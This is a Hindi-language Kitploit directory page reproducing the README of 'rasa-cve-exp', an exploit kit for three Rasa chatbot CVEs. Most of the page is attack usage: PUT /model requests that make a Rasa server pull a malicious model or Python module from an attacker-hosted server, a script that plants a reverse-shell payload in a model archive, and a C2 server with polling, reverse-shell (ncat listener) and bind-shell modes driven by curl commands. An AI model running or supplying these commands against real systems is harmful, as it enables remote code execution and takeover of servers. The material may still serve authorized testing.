Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
उपकरण/GitHubGitHub/lierbushiwo/rasa-cve-exp
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

13 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

सीधे चलाएं

root@kitploit:~
python server-1.py

image-20260604134536291

मनमानी फ़ाइल अपलोड

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

प्रभाव इस प्रकार है:

image-20260604135232815

CVE-2021-41127

  • server-1.py

डिफ़ॉल्ट मॉडल नाम evil_import_model.tar.gz

दुर्भावनापूर्ण मॉडल डेमो

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet
टूल डाउनलोड करें

दुर्भावनापूर्ण संवाद नियम सेट करें greet दर्ज करें, PWNED_BY_CTF लौटाएगा

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

प्रभाव इस प्रकार है

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py संपीड़ित पैकेज के अंदर निर्दिष्ट डेटा को संशोधित करता है

सीधे चलाएं, डिफ़ॉल्ट रूप से /model निर्देशिका से मॉडल पढ़ता है, संशोधित करता है और वर्तमान निर्देशिका में evil_import_model.tar.gz के रूप में सहेजता है

image-20260604143558105

रिवर्स IP निर्दिष्ट करें

डिफ़ॉल्ट मॉडल नाम evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

क्रम में डेटा भेजें

अन्य शोषण तकनीकें exp

  • server-2.py

तीन मोड


C2 मोड (HTTP पोलिंग, अनुशंसित)

root@kitploit:~
हमलावर मशीन                     Rasa कंटेनर (लक्ष्य)
  │                            │
  ├─ server-2.py शुरू करें ─────────┤
  ├─ PUT /model ──→ pwnmod.py को /app/ में डाउनलोड करें
  ├─ PUT /model ──→ दुर्भावनापूर्ण मॉडल डाउनलोड करें → import pwnmod → agent शुरू होता है
  │                            │
  │  ← GET /poll?agent=xxx ───┤  हर 3 सेकंड पर पोल
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  कमांड प्राप्त करना
  │  ← POST /result ──────────┤  परिणाम वापस भेजना
  ├─ /last?agent=xxx ──→ परिणाम पढ़ना
root@kitploit:~
# हमलावर मशीन शुरू करें
python server-2.py --mode c2 --c2-base-url http://<हमलावर मशीन IP>:8000 --port 8000

# एक्सप्लॉइट ट्रिगर करें (दो चरण)
curl -X PUT http://<rasa पता>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<हमलावर मशीन IP>:8000/write-module"}}'

curl -X PUT http://<rasa पता>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<हमलावर मशीन IP>:8000/model"}}'

# कमांड जारी करें
curl "http://<हमलावर मशीन IP>:8000/enqueue?cmd=id"

# 8 सेकंड प्रतीक्षा करें फिर परिणाम पढ़ें (agent हर 3 सेकंड में पोल करता है + निष्पादन समय)
curl "http://<हमलावर मशीन IP>:8000/last?agent=<होस्टनाम>"

# agent निर्दिष्ट न करना भी ठीक है (वाइल्डकार्ड का उपयोग करें)
curl "http://<हमलावर मशीन IP>:8000/enqueue?cmd=whoami"
curl "http://<हमलावर मशीन IP>:8000/last"

रिवर्स मोड (रिवर्स शेल)

root@kitploit:~
# 1) हमलावर मशीन सुनना शुरू करें
ncat -lvnp 4444

# 2) हमलावर मशीन server-2.py शुरू करें
python server-2.py --mode reverse --reverse-host <हमलावर मशीन IP> --reverse-port 4444 --port 8000

# 3) एक्सप्लॉइट ट्रिगर करें
curl -X PUT http://<rasa पता>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<हमलावर मशीन IP>:8000/write-module"}}'

curl -X PUT http://<rasa पता>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<हमलावर मशीन IP>:8000/model"}}'

# 4) nc को $ प्रॉम्प्ट मिलता है, सीधे इंटरैक्ट करें

बाइंड मोड (फॉरवर्ड शेल, कम उपयोगी)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# agent लक्ष्य कंटेनर में 0.0.0.0:4444 पर सुनता है
# ncat <लक्ष्य IP> 4444 से कनेक्ट करें

पोर्ट/पता विवरण

पैरामीटरअर्थ
--port 8000server-2.py का स्वयं का सुनने वाला पोर्ट
--c2-base-urlC2 मोड में agent द्वारा पोल किया जाने वाला पूर्ण base URL (कंटेनर द्वारा सुलभ पता होना चाहिए)
--reverse-hostरिवर्स शेल का लक्ष्य IP
--reverse-portरिवर्स शेल का लक्ष्य पोर्ट